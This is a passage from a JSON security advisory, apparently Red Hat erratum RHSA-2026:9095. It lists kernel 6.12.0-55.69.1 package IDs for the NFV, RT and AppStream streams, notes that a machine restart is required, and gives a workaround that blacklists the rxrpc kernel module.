"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64"
],
"restart_required": {
"category": "machine"
},
"url": "https://access.redhat.com/errata/RHSA-2026:9095"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module rxrpc from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
